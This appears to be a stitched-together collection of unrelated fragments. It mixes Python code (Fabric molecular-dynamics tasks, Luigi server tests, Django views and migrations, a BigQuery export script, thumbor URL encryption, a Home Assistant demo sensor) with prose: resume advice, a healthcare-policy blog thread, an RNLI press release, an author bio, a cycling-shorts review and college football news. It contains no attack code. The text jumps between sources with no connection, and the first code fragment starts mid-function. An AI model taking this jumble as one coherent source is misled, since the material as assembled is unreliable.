    ibi_out_dir = os.path.join(env.localroot, 'output_blackbox', os.path.basename(ibi_script), outdir)
    local("mkdir -p %s" % (ibi_out_dir))
#    if copy == "yes":
#        blackbox("copy_lammps_results.sh", "%s %s %d" % (os.path.join(env.localroot,'results',outdir), os.path.join(env.localroot,'python'), int(number)))
    blackbox(ibi_script, "%s %s %s %s %s" % (atom_dir, number, pressure, ibi_in_dir, ibi_out_dir))
    if copy == "yes":
        blackbox("prepare_lammps_config.sh", "%s %s %s %d %s" % (ibi_out_dir, os.path.join(env.localroot, 'config_files'), config_name, int(number) + 1, atom_dir))


@task
def ibi_analysis_multi(start_iter, num_iters, outdir_prefix, outdir_suffix, ibi_script="ibi.sh", pressure=1, atom_dir=os.path.join(env.localroot, 'python')):
    """ Recreate IBI analysis results based on the output files provided.
    Example use: fab hector ibi_analysis_multi:start_iter=7,num_iters=3,outdir_prefix=peg_,outdir_suffix=_hector_32 """
    si = int(start_iter)
    ni = int(num_iters)
    for i in xrange(si, si + ni):
        outdir = "%s%d%s" % (outdir_prefix, i, outdir_suffix)
        do_ibi(i, outdir, pressure, outdir_prefix, "no", ibi_script, atom_dir)
#        ibi_in_dir = os.path.join(env.localroot,'results',outdir)
#        ibi_out_dir = os.path.join(env.localroot,'ibi_output',outdir)
#        local("mkdir -p %s" % (ibi_out_dir))
#        blackbox("copy_lammps_results.sh", "%s %s %d" % (os.path.join(env.localroot,'results',"%s%d%s" % (outdir_prefix,i,outdir_suffix)), os.path.join(env.localroot,'python'), i))
#        blackbox(ibi_script, "%s %s %s %s" % (i, pressure, ibi_in_dir, ibi_out_dir))


@task
def full_ibi(config, number, outdir, config_name, pressure=0.3, ibi_script="ibi.sh", atom_dir=os.path.join(env.localroot, 'python'), **args):
    """ Performs both do_ibi and runs lammps with the newly created config file.
    Example use: fab hector full_ibi:config=2peg4,number=3,outdir=2peg3_hector_32,config_name=2peg,cores=32,wall_time=3:0:0 """
    do_ibi(number, outdir, pressure, config_name, "yes", ibi_script, atom_dir)
    lammps(config, **args)
    wait_complete()
    fetch_results(regex="*%s*" % (config_name))


@task
def full_ibi_multi(start_iter, num_iters, config_name, outdir_suffix, pressure=0.3, script="ibi.sh", atom_dir=os.path.join(env.localroot, 'python'), **args):
    """ Do multiple IBI iterations in one command.
    Example use: fab hector full_ibi_multi:start_iter=7,num_iters=3,config_name=2peg,outdir_suffix=_hector_32,cores=32,wall_time=3:0:0 """
    si = int(start_iter)
    ni = int(num_iters)
    pressure_changed = 0
    for i in xrange(si, si + ni):
        full_ibi("%s%d" % (config_name, i + 1), i, "%s%d%s" % (config_name, i, outdir_suffix), config_name, pressure, script, atom_dir, **args)
        p_ave, p_std = lammps_get_pressure(os.path.join(env.localroot, "results", "%s%d%s" % (config_name, i, outdir_suffix)), i)
        print "Average pressure is now", p_ave, "after iteration", i, "completed."
#        if(i >= 10 and p_ave < p_std):
#            if pressure_changed == 0:
#                pressure = float(pressure)/3.0
#                pressure_changed = 1
#                print "(FabMD:) Pressure factor now set to", pressure, "after iteration", i
#        if abs(p_ave) - (p_std*0.5) < 0:  # We have converged, let's not waste further CPU cycles!
#            print "(FabMD:) Pressure has converged. OPTIMIZATION COMPLETE"
#            break


### Utility Functions

def lammps_get_pressure(log_dir, number):
    steps = []
    pressures = []
    LIST_IN = open(os.path.join(log_dir, "new_CG.prod%d.log" % (number)), 'r')
    for line in LIST_IN:
        NewRow = (line.strip()).split()
        if len(NewRow) > 0:
            if NewRow[0] == "Press":
                pressures.append(float(NewRow[2]))
    d1 = np.array(pressures[5:])
    print "READ: new_CG.prod%d.log" % (number)
    return np.average(d1), np.std(d1)  # average and stdev
|
The few, the proud, the ones I didn't delete.
Architecture is probably my favorite thing to take pictures of. These are a bunch of photos I don't really have a purpose for but that I still love. |
# -*- coding: utf-8 -*-
#
# Copyright 2012-2015 Spotify AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import multiprocessing
import random
import signal
import time
import tempfile

from helpers import unittest, with_config

import luigi.rpc
import luigi.server
from luigi.scheduler import CentralPlannerScheduler
from tornado.testing import AsyncHTTPTestCase


class ServerTestBase(AsyncHTTPTestCase):

    def get_app(self):
        return luigi.server.app(CentralPlannerScheduler())

    def setUp(self):
        super(ServerTestBase, self).setUp()

        self._old_fetch = luigi.rpc.RemoteScheduler._fetch

        def _fetch(obj, url, body, *args, **kwargs):
            response = self.fetch(url, body=body, method='POST')
            if response.code >= 400:
                raise luigi.rpc.RPCError(
                    'Error when connecting to remote scheduler'
                )
            return response.body.decode('utf-8')

        luigi.rpc.RemoteScheduler._fetch = _fetch

    def tearDown(self):
        super(ServerTestBase, self).tearDown()
        luigi.rpc.RemoteScheduler._fetch = self._old_fetch


class ServerTest(ServerTestBase):

    def test_visualizer(self):
        page = self.fetch('/').body
        self.assertTrue(page.find(b'<title>') != -1)

    def _test_404(self, path):
        response = self.fetch(path)
        self.assertEqual(response.code, 404)

    def test_404(self):
        self._test_404('/foo')

    def test_api_404(self):
        self._test_404('/api/foo')


class ServerTestRun(unittest.TestCase):
    """Test to start and stop the server in a more "standard" way
    """

    def run_server(self):
        luigi.server.run(api_port=self._api_port, address='127.0.0.1')

    def start_server(self):
        self._api_port = random.randint(1024, 9999)
        self._process = multiprocessing.Process(target=self.run_server)
        self._process.start()
        time.sleep(0.1)  # wait for server to start
        self.sch = luigi.rpc.RemoteScheduler(host='localhost', port=self._api_port)
        self.sch._wait = lambda: None

    def stop_server(self):
        self._process.terminate()
        self._process.join(1)
        if self._process.is_alive():
            os.kill(self._process.pid, signal.SIGKILL)

    def setUp(self):
        state_path = tempfile.mktemp(suffix=self.id())
        luigi.configuration.get_config().set('scheduler', 'state_path', state_path)
        self.start_server()

    def tearDown(self):
        self.stop_server()

    def test_ping(self):
        self.sch.ping(worker='xyz')

    def test_raw_ping(self):
        self.sch._request('/api/ping', {'worker': 'xyz'})

    def test_raw_ping_extended(self):
        self.sch._request('/api/ping', {'worker': 'xyz', 'foo': 'bar'})

    def test_404(self):
        with self.assertRaises(luigi.rpc.RPCError):
            self.sch._request('/api/fdsfds', {'dummy': 1})

    def test_save_state(self):
        self.sch.add_task('X', 'B', deps=('A',))
        self.sch.add_task('X', 'A')
        self.assertEqual(self.sch.get_work('X')['task_id'], 'A')
        self.stop_server()
        self.start_server()
        work = self.sch.get_work('X')['running_tasks'][0]
        self.assertEqual(work['task_id'], 'A')


if __name__ == '__main__':
    unittest.main()
|
# Imports needed by this view (the original snippet omitted them).
from django.conf import settings
from django.core.mail import EmailMessage
from django.core.urlresolvers import reverse
from django.shortcuts import redirect, render_to_response
from django.template import RequestContext
# Assumption: the ContactForm lives in a forms.py next to this views module.
from .forms import ContactForm


def contact_form(request):
    if request.method == 'POST':
        form = ContactForm(request.POST)
        if form.is_valid():
            name = form.cleaned_data['name']
            mail = form.cleaned_data['mail']
            subject = "[Verleihsystem:Kontakt]: " + form.cleaned_data['subject']
            message = form.cleaned_data['message']
            cc_myself = form.cleaned_data['cc_myself']
            recipients = [getattr(settings, 'CONTACT_FORM_EMAIL', '')]
            if cc_myself:
                recipients.append(mail)
            email = EmailMessage(subject=subject, body=message,
                                 to=recipients, headers={'Reply-To': mail})
            email.send()
            return redirect(reverse('home'))
    else:
        if request.user.is_anonymous():
            form = ContactForm()
        else:
            name = "%s %s" % (request.user.first_name, request.user.last_name)
            mail = request.user.email
            form = ContactForm(initial={'name': name, 'mail': mail})
    return render_to_response('contact/contact_form.html', {'form': form},
                              context_instance=RequestContext(request))
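

# Sketch of the ContactForm referenced above (assumption): the form class is
# not part of this snippet; the fields below are inferred from the
# cleaned_data keys used in the view, with illustrative types and lengths.
#
#     from django import forms
#
#     class ContactForm(forms.Form):
#         name = forms.CharField(max_length=100)
#         mail = forms.EmailField()
#         subject = forms.CharField(max_length=100)
#         message = forms.CharField(widget=forms.Textarea)
#         cc_myself = forms.BooleanField(required=False)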
|
Will a prospective employer be motivated to learn more about you from reading your resume? Resumes are important tools for communicating your purpose and capabilities to employers. A resume advertises your qualifications to prospective employers and is your calling card for getting interviews. You can craft your resume by understanding the different types, construction elements, and refinements necessary to make it your effective first impression to employers.
The chronological resume lists your jobs in reverse chronological order with a description of what you did in each job. It shows the progression of your skills and experience with each assignment.
The functional resume describes your core competencies and the functions you can perform. It focuses on what you can do outside the context of specific jobs you’ve held.
The combination resume is a hybrid that combines your functional expertise with your work history. It typically doesn’t go back as far as a chronological resume, just highlighting your last two or three assignments.
For most transitioning military, we recommend the combination format because it highlights your functional expertise and also shows your most recent assignments.
Contact Information – Who you are/how to contact you – your name, address, phone number and email address. You may also want to include your LinkedIn profile's URL.
I want a _(position/job)_ where I will use my _(skills/abilities)_, which will result in _(outcomes/benefits)_.
A position in data analysis where skills in mathematics, computer programming, and deductive reasoning will contribute to new systems development.
Experience – What you can do – your patterns of skills and accomplishments.
Work History – What you have done – your job titles and activities performed.
Education – What you have learned – your education and training/degrees and certifications.
On the Assess Your Skills & Interests Step, you identified your work-content skills and functional skills. Use the exercises you completed to communicate your experience, work history, and education to employers in your resume.
Other categories may be included but should be limited to only those relevant to your job search, such as professional affiliations, special skills not covered in other sections of your resume, or awards and special recognition. Samples of resumes that can be downloaded and used as a template are found in Additional Resources to the right. The examples represent a broad cross-section of the types of jobs that most transitioning military service members would likely seek. These are Microsoft Word documents that you can upload and modify to suit your needs, or just use as a reference. If you have multiple career interests you will want to develop a resume for each.
Resume Critiquing –Does your resume accurately present your qualifications in the best possible light so that the hiring managers will want to call you in for an interview? That is the true test of an effective resume!
Internal Evaluation: Review the Resume Do's and Don'ts infographic to make sure your resume conforms to these rules.
External Evaluation: Circulate your resume to three or more individuals whom you believe will give you objective and useful feedback (avoid people who tend to flatter you). Ask that they critique your draft resume and suggest improvements in form and content. The best evaluator would be someone in a hiring position similar to one you will encounter in the actual interview. Not only will you get useful feedback, but it will spread the word that you are job hunting and could lead to an interview!
Letters play a key role in a job search and come in several forms, including cover letters, approach letters, and thank you letters. Samples of each type of letter can be found in Additional Resources to the right.
Persuade the reader of your benefit or value.
Convince the reader with factual evidence.
Move the reader to acquire the product.
State your interest and reason for writing.
Highlight your possible value to the employer.
State that you will call the individual at a particular time to see if an interview can be scheduled.
Approach letters are written for the purpose of developing job contacts, leads, or information. These letters help you gain access to the hidden job market by making networking contacts that lead to those all-important informational interviews. State your purpose, but do not suggest that you are asking for a job – only career advice or information. Request a meeting and indicate you will call to schedule it at a mutually convenient time.
Construct your resume. Use the sample resumes below to assist you in writing your resume.
Write your job search letters. Use the sample letters below to assist you in writing various types of job search letters. |
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models


class Migration(SchemaMigration):

    def forwards(self, orm):
        # Adding model 'PaperCitation'
        db.create_table(u'common_papercitation', (
            (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('slug', self.gf('django.db.models.fields.CharField')(unique=True, max_length=128)),
            ('inline_citation', self.gf('django.db.models.fields.CharField')(max_length=128, blank=True)),
            ('authors', self.gf('django.db.models.fields.TextField')(blank=True)),
            ('title', self.gf('django.db.models.fields.TextField')(blank=True)),
            ('journal', self.gf('django.db.models.fields.TextField')(blank=True)),
            ('url', self.gf('django.db.models.fields.URLField')(max_length=200, blank=True)),
        ))
        db.send_create_signal(u'common', ['PaperCitation'])

    def backwards(self, orm):
        # Deleting model 'PaperCitation'
        db.delete_table(u'common_papercitation')

    models = {
        u'common.papercitation': {
            'Meta': {'object_name': 'PaperCitation'},
            'authors': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'inline_citation': ('django.db.models.fields.CharField', [], {'max_length': '128', 'blank': 'True'}),
            'journal': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
            'slug': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '128'}),
            'title': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
            'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'})
        }
    }

    complete_apps = ['common']
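

# Usage note (assumption): South migrations like this one are applied with
# the management command, e.g.:
#
#     python manage.py migrate common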
The ACP Advocate Blog: "You say you want a revolution, well you know, we’d all like to see the plan"
The thing about myths is that there is some grain of truth in them.
I recently obtained a book from the Medical Group Management Association (MGMA) with survey results for costs of primary care practices. They broke up each primary care specialty into non-hospital or Integrated Delivery System (IDS) owned (independent) and hospital or IDS owned groups. The sad part is that there were inadequate numbers of surveys for the independent internal medicine practices to even have the category in the book. They only had 9 surveys completed and 10 were required. Using independent family practice as a surrogate for independent internal medicine, it was easily determined that independent general internists cannot generate enough income from Medicare office visits to even cover overhead. Hospital or IDS owned practices using provider-based billing were easily able to cover overhead and make a little extra income from Medicare office visits.
As a result of this unfair billing system, about 90% of outpatient general internists are now employed by hospitals or IDS’s. Because good primary care loses revenue for their employer, I have witnessed insane office schedules forced on the internists so they literally do not have the time to practice good primary care.
In an ACO, the incentive is to reduce costs compared to previous years of spending and projected spending. The resultant “savings” is then shared with the ACO. In this scenario, good primary care is then valued and supported.
So according to the Mythbusters, the two myths are plausible; it's just not known whether the government intended it to happen or simply didn't care.
Adding to Jay’s thought I have always considered physicians to have a 30 year working life compared to a 40 year working life for the general public.
Additionally doctors are saddled with a horrendous student debt, a topic in itself. My personal feeling is schools have a desire to capture some of their students above average income long after they have graduated.
Moving forward doctors have to pay for their debt, care for their family, educate their children and provide for their retirement on a shortened work cycle.
We have to change the system.
I don't doubt that there is a trend to larger practices, and that hospital owned practices are becoming more common. I also don't question the economic struggles of physicians in smaller independent practices. The point of my blog post is that these trends, which were occurring long before Obamacare became law and continue today, are not by government intent or design to eliminate independent practices--that is the myth part--but a consequence of market forces that have been buffeting small practices for a long time. ACOs and PCMHs offer the potential of helping physician owned practices by opening up funding and revenue--care coordination payments, shared savings--in addition to their usual FFS reimbursement. And Medicare's decision to select mostly physician owned practices for the ACO initiative, rather than hospital owned ones, suggests to me that at least some in government are betting that doctors who own their own groups will do better than hospitals in increasing access and controlling cost.
Thank you Bob, for quoting two organizations that have less than zero combined credibility in the minds of independent physicians - the AMA and CMS.
While I agree that the loss of independent IM practices started before Obamacare, this process will rapidly accelerate after the advent of ACOs. The myth that these organizations selected by CMS are "physician-led" is the biggest one you conveniently hide. You also forget what Dr. Emmanuel himself admitted in the now infamous article in the Annals a while ago... that the disappearance of the private practice of medicine was an inevitable outcome of Obamacare.
I meant to say that about 90% of Montana general internists are hospital or IDS employed. 4 years ago it was about 60%. The market forces you commented on are more acutely felt in a rural environment. Intended or not, the average small group or solo practitioners who don't have lucrative ancillary services like diagnostic imaging cannot generate enough income from Medicare office visits to cover practice expenses. So as the percentage of Medicare patients in an internist's practice goes up, practice viability goes down. At some point the physician faces the options of leaving practice, becoming a hospitalist, or joining a hospital group.
You are correct that this is not due to the Affordable Care Act. This pernicious problem has been present for years. Because of provider-based billing, hospitals (which already consume the lion's share of health care dollars) are given even more money from Medicare A if they employ physicians. Also, hospital employed physicians tend to have their labs, referrals, and diagnostic imaging stay within the hospital system, capturing that revenue also.
This link is part of a series on the situation in Pittsburgh, one that I find happening in my community and seen in other parts of the country, as a business model and eliminating competition take precedence over medical care.
# Amara, universalsubtitles.org
#
# Copyright (C) 2013 Participatory Culture Foundation
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see
# http://www.gnu.org/licenses/agpl-3.0.html.
from datetime import datetime

from django import forms
from django.contrib import admin
from django.contrib.admin import widgets
from django.contrib.auth.admin import UserAdmin
from django.contrib.auth.forms import UserCreationForm
from django.contrib.auth.models import User
from django.db import models
from django.utils.translation import ugettext_lazy as _

from models import CustomUser, Announcement


class CustomUserCreationForm(UserCreationForm):
    username = forms.RegexField(label=_("Username"), max_length=30, regex=r'^\w+$',
        help_text=_("Required. 30 characters or fewer. Alphanumeric characters only (letters, digits and underscores)."),
        error_message=_("This value must contain only letters, numbers and underscores."))
    password1 = forms.CharField(label=_("Password"), widget=forms.PasswordInput)
    password2 = forms.CharField(label=_("Password confirmation"), widget=forms.PasswordInput)
    email = forms.EmailField(label=_('Email'))

    class Meta:
        model = CustomUser
        fields = ("username", "email")


class CustomUserAdmin(UserAdmin):
    add_form = CustomUserCreationForm
    list_display = ('username', 'email', 'first_name', 'last_name', 'is_staff',
                    'is_superuser', 'last_ip', 'partner')
    search_fields = ('username', 'first_name', 'last_name', 'email', 'id')
    add_fieldsets = (
        (None, {
            'classes': ('wide',),
            'fields': ('username', 'email', 'password1', 'password2')}
         ),
    )


class AnnouncementAdmin(admin.ModelAdmin):
    formfield_overrides = {
        models.CharField: {'widget': widgets.AdminTextareaWidget}
    }
    list_display = ('content', 'created', 'visible')
    actions = ['make_hidden']

    def get_form(self, request, obj=None, **kwargs):
        form = super(AnnouncementAdmin, self).get_form(request, obj=None, **kwargs)
        default_help_text = form.base_fields['created'].help_text
        now = datetime.now()
        form.base_fields['created'].help_text = default_help_text + \
            u'</br>Current server time is %s. Value is saved without timezone converting.' % now.strftime('%m/%d/%Y %H:%M:%S')
        return form

    def visible(self, obj):
        return not obj.hidden
    visible.boolean = True

    def make_hidden(self, request, queryset):
        Announcement.clear_cache()
        queryset.update(hidden=True)
    make_hidden.short_description = _(u'Hide')


admin.site.register(Announcement, AnnouncementAdmin)
admin.site.unregister(User)
admin.site.register(CustomUser, CustomUserAdmin)
|
The perils of our much loved coastline will be brought to life next week, at the launch of London’s newest drinking destination – The Bottle, boasting the UK’s largest range of hand-sourced bottled water, all of it straight from the sea.
Pop-up bar The Bottle is being opened next week (Thursday 8 - Saturday 10 September) at Pop Brixton to promote the Royal National Lifeboat Institution’s (RNLI) H2Only fundraising challenge, as well as the courage (‘bottle’) of the charity’s volunteer lifeboat crews. The Bottle will showcase 10 different regional varietals of sea water, and every bottle tells a story of a well-loved British or Irish coastal location, and how its water can kill.
Each looks refreshing at first glance but the description and tasting notes highlight the dangerous and often life threatening potential contained inside. All of the water has been sourced from popular shorelines the length and breadth of the UK and Ireland - the same water the RNLI’s volunteer lifeboat crew members save lives from every day, with 7,973 people rescued last year.
Of course, the bottled sea water won’t actually be available to drink. Instead, free bottles of mineral water will be handed out to help people kick start their commitment to stay on the water to help the RNLI stay on the water. Sign up to the challenge at h2only.org.uk and give up the drinks you love for 10 days to raise vital funds for the RNLI.
“It’s a striking way to catch the eye of young Londoners and interest them in the challenge,” explained Neil Withers, Thames Operations Manager at the RNLI. “It’s also a way for us to showcase the bottle – the courage – of our volunteer lifeboat crew members who brave extreme conditions day-in day-out and rescue an average of 22 people per day.”
The H2Only challenge runs from Tuesday 13 September to Friday 23 September. For more information, or to sign-up to take on the H2Only challenge, visit h2only.org.uk.
Please contact the H2Only press team at [email protected] / 020 7025 6613 for further information and images. |
# -*- coding: utf-8 -*-
import sys
import csv
import datetime

from google.cloud import bigquery

if __name__ == '__main__':
    client = bigquery.Client()
    query = (
        'SELECT * '
        'FROM `mcourser-mexico-he.events.events2017*` '
        'WHERE SUBSTR(username,0,3) IN ("DUR","JAL") '  # trailing space needed before AND when concatenating
        'AND LENGTH(username) > 9')
    query_results = client.run_sync_query(query)
    query_results.use_legacy_sql = False
    query_results.run()

    if query_results.complete:
        with open('datos_bigquery.csv', 'wb') as csvfile:
            writer = csv.writer(csvfile, quoting=csv.QUOTE_ALL)
            writer.writerow(['random_event_id', 'created_date', 'event_type', 'session_type', 'user_id',
                             'username', 'firstname', 'lastname', 'user_role', 'user_school_id', 'user_school_name',
                             'lesson_id', 'lesson_title', 'lesson_type', 'course_id', 'course_title', 'course_lessons_count',
                             'course_ebooks_count', 'chapter_id', 'chapter_title', 'assignment_id', 'group_assignment_id',
                             'assignment_grade', 'assignment_state', 'assignment_due_date', 'score', 'errors_count',
                             'checks_count', 'mistake_count', 'session_duration', 'request_country_code', 'request_region',
                             'request_city', 'request_citylatlon', 'user_agent', 'mlibro_system_version', 'mlibro_version',
                             'mlibro_type', 'mlibro_GUID', 'mlibro_language', 'user_email', 'user_first_name_adult',
                             'user_last_name_adult', 'user_email_adult', 'user_age_type', 'user_regulation_agreement',
                             'user_regulation_marketing', 'user_regulation_information', 'user_school_national_id',
                             'user_school_type', 'user_school_city', 'user_school_zip_code', 'user_school_province',
                             'user_school_country', 'user_school_email'])
            for row in query_results.rows:
                result = []
                for elem in row:
                    if type(elem) == unicode:
                        result.append(elem.encode('utf-8'))
                    elif type(elem) == datetime.datetime:
                        result.append(elem.strftime('%Y-%m-%d %H:%M:%S UTC'))
                    elif type(elem) == int:
                        result.append(elem)
                    elif elem is None:
                        result.append('')
                    else:
                        result.append(elem)
                writer.writerow(result)
    elif query_results.errors:
        print(str(query_results.errors))
        sys.exit(1)
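
# Note (assumption): run_sync_query comes from an early google-cloud-bigquery
# release; in current versions the equivalent flow is roughly:
#
#     job = client.query(query)   # standard SQL by default
#     for row in job.result():
#         ...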
|
Sadie Plant was born in Birmingham and studied at the University of Manchester, where she gained her PhD in Philosophy in 1989. She has been a Lecturer in Cultural Studies at the University of Birmingham and a Research Fellow in the Department of Philosophy at the University of Warwick before leaving the academic world to work independently and write full-time. She is the author of The Most Radical Gesture: The Situationist International in a Postmodern Age (1992), Zeros and Ones: Digital Women and the New Technoculture (1997), and Writing on Drugs (2001). |
#!/usr/bin/python
# -*- coding: utf-8 -*-
# thumbor imaging service
# https://github.com/globocom/thumbor/wiki
# Licensed under the MIT license:
# http://www.opensource.org/licenses/mit-license
# Copyright (c) 2011 globo.com [email protected]
import base64
import hashlib
import hmac
from Crypto.Cipher import AES
from .url import Url
from six import text_type, PY3, b, PY2
class Cryptor(object):
def __init__(self, security_key):
self.security_key = (security_key * 16)[:16]
def encrypt(self,
width,
height,
smart,
adaptive,
full,
fit_in,
flip_horizontal,
flip_vertical,
halign,
valign,
trim,
crop_left,
crop_top,
crop_right,
crop_bottom,
filters,
image):
generated_url = Url.generate_options(
width=width,
height=height,
smart=smart,
meta=False,
adaptive=adaptive,
full=full,
fit_in=fit_in,
horizontal_flip=flip_horizontal,
vertical_flip=flip_vertical,
halign=halign,
valign=valign,
trim=trim,
crop_left=crop_left,
crop_top=crop_top,
crop_right=crop_right,
crop_bottom=crop_bottom,
filters=filters
)
url = "%s/%s" % (generated_url, hashlib.md5(b(image)).hexdigest())
pad = lambda s: s + (16 - len(s) % 16) * "{"
cipher = AES.new(self.security_key)
if PY2:
url = url.encode('utf-8')
encrypted = base64.urlsafe_b64encode(cipher.encrypt(pad(url)))
return encrypted
def get_options(self, encrypted_url_part, image_url):
try:
opt = self.decrypt(encrypted_url_part)
except ValueError:
opt = None
if not opt and not self.security_key and self.context.config.STORES_CRYPTO_KEY_FOR_EACH_IMAGE:
security_key = self.storage.get_crypto(image_url)
if security_key is not None:
cr = Cryptor(security_key)
try:
opt = cr.decrypt(encrypted_url_part)
except ValueError:
opt = None
if opt is None:
return None
image_hash = opt and opt.get('image_hash')
image_hash = image_hash[1:] if image_hash and image_hash.startswith('/') else image_hash
path_hash = hashlib.md5(image_url.encode('utf-8')).hexdigest()
if not image_hash or image_hash != path_hash:
return None
opt['image'] = image_url
opt['hash'] = opt['image_hash']
del opt['image_hash']
return opt
def decrypt(self, encrypted):
cipher = AES.new(self.security_key)
try:
debased = base64.urlsafe_b64decode(encrypted.encode("utf-8"))
decrypted = cipher.decrypt(debased)
if PY3:
decrypted = decrypted.decode('ascii')
decrypted = decrypted.rstrip('{')
except TypeError:
return None
result = Url.parse_decrypted('/%s' % decrypted)
result['image_hash'] = result['image']
del result['image']
return result
class Signer:
def __init__(self, security_key):
if isinstance(security_key, text_type):
security_key = security_key.encode('utf-8')
self.security_key = security_key
def validate(self, actual_signature, url):
url_signature = self.signature(url)
return url_signature == actual_signature
def signature(self, url):
return base64.urlsafe_b64encode(hmac.new(self.security_key, text_type(url).encode('utf-8'), hashlib.sha1).digest())
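# Usage sketch (hypothetical key and path, for illustration only):
if __name__ == '__main__':
    signer = Signer('my-security-key')
    sig = signer.signature('300x200/smart/path/to/image.jpg')
    print(signer.validate(sig, '300x200/smart/path/to/image.jpg'))  # True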
|
For years, I’ve been lamenting the fact that despite searching in every cycling shop I visited, I was unable to find a pair of women’s shorts with a water resistant seat (back). My husband had purchased a pair a long time ago and it always frustrated me that when we were out biking together on those wet and muddy days, I was soon soaked to the skin while he stayed relatively dry.
I was under no illusion that wearing a pair of water resistant backed shorts would keep me bone dry, but I was hoping to stay more comfortable for longer when conditions were soggy. One consideration had been a pair of full waterproof shorts/trousers which I came across a year or two ago, but they just felt too heavy and uncomfortable – plus I expected that I would overheat wearing them in Autumn/Spring.
The day I came across the Madison Flo DWR shorts in 18 Bikes brought a big smile to my face. Finally, a manufacturer had concentrated on technical kit for women to ride their mountain bikes comfortably throughout the year. I have to admit that I love Madison cycling clothing (everything I’ve bought so far has performed well and been super comfortable to wear), so it took very little to persuade me to purchase.
Armed with my new shorts, I headed up to Scotland in October for a few days playing around on the trails at Glentress. I expected cool, wet conditions with plenty of opportunity to fully test my new purchase. What I actually found was one of the warmest weeks of the year. The waterproof backed shorts were too warm for the conditions and ended up relegated to my bag for the entire trip.
The next few weeks were relatively mild and dry with little opportunity for some proper technical testing – ironically, for once, I wanted muddy, wet conditions. Eventually, my wish came true and after a day mountain biking through some huge puddles in Swaledale, I finally got to test my new shorts in anger.
The large waterproof rear panel was great for delaying water seepage and I was glad that it covered more than just the immediate seat area. Thumbs up Madison for considering that – they are a step up from the ones my husband has been wearing all this time!
The bagginess in the shorts stops them from feeling restrictive and I love how they look off the bike. Combined with the stretch in the front panel (which is DWR fabric), they’re a really comfortable short to wear. However, the bagginess does also mean that they sometimes feel like they’re flapping around while cycling – admittedly I’ve not worn them with knee pads yet (I suspect the extra volume would then be welcome).
The legs have extra venting with zips opening to mesh (although I haven’t felt the need to use them so far) and there is plenty of storage in the zipped pockets.
18 Bikes displaying my jacket & shorts colour coordination!
There’s very little that I would alter about these shorts. If I were being really picky, then perhaps they’re a little low at the back, meaning that they rode down a tiny bit while I was leaning forward on my bike. However, that is being really picky, and tightening the Velcro more at the waist minimised the movement. It’s certainly not something that would stop me from purchasing the shorts.
If you’re in the market for a pair of waterproof backed shorts, definitely check them out. At RRP £69.99 they’re not the cheapest pair of shorts I’ve ever bought, but I honestly think they will be the best value for money I spend on cycling kit this winter.
Oh, and the orange (red chilli) zips match the colour of my Madison Flux Softshell jacket perfectly – bonus! |
"""
Demo platform that has a couple of fake sensors.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/demo/
"""
from homeassistant.const import (
ATTR_BATTERY_LEVEL, TEMP_CELSIUS, DEVICE_CLASS_HUMIDITY,
DEVICE_CLASS_TEMPERATURE)
from homeassistant.helpers.entity import Entity
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up the Demo sensors."""
add_entities([
DemoSensor('Outside Temperature', 15.6, DEVICE_CLASS_TEMPERATURE,
TEMP_CELSIUS, 12),
DemoSensor('Outside Humidity', 54, DEVICE_CLASS_HUMIDITY, '%', None),
])
class DemoSensor(Entity):
"""Representation of a Demo sensor."""
def __init__(self, name, state, device_class,
unit_of_measurement, battery):
"""Initialize the sensor."""
self._name = name
self._state = state
self._device_class = device_class
self._unit_of_measurement = unit_of_measurement
self._battery = battery
@property
def should_poll(self):
"""No polling needed for a demo sensor."""
return False
@property
def device_class(self):
"""Return the device class of the sensor."""
return self._device_class
@property
def name(self):
"""Return the name of the sensor."""
return self._name
@property
def state(self):
"""Return the state of the sensor."""
return self._state
@property
def unit_of_measurement(self):
"""Return the unit this state is expressed in."""
return self._unit_of_measurement
@property
def device_state_attributes(self):
"""Return the state attributes."""
if self._battery:
return {
ATTR_BATTERY_LEVEL: self._battery,
}
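# Usage sketch (assumption: loaded by Home Assistant's demo component via
# `sensor: [{platform: demo}]` in configuration.yaml, which invokes
# setup_platform() above to register the two sensors).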
|
Georgia Tech continues to improve the football game day experience for Yellow Jacket fans.
There are several pieces of news and notes for Saturday’s game against Presbyterian (7 p.m.).
Tim Hanchey, who has served as public address announcer for the Atlanta Falcons and the Chick-fil-A Bowl, will make his debut at Bobby Dodd Stadium Saturday night. Hanchey is filling in for longtime P.A. announcer John Pendergast, who is taking the season off.
Saturday’s game vs. Presbyterian is Youth Day. Any group or team can take advantage of a special group rate of $8 per ticket. Call the ticket office at 1-888-TECH-TIX for more information.
Beginning Friday, Atlantic Station and Georgia Tech will launch a series of Friday Night Fan Fests – tailgate-style celebrations, food and fun for Georgia Tech students, alumni and fans. Friday Night Fan Fests coincide with seven home football weekends and will be free to the public.
Events begin at 7 p.m. in Central Park with live music, the Yellow Jacket Marching Band, the Georgia Tech spirit squad, Tech merchandise, Buzz the mascot and the Ramblin’ Wreck.
Fans can take advantage of a complimentary game day shuttle service between Atlantic Station and Bobby Dodd Stadium. Fans can park at Atlantic Station, avoid the traffic to campus and enjoy a meal and shopping before or after the game at any of the restaurants and establishments on-site.
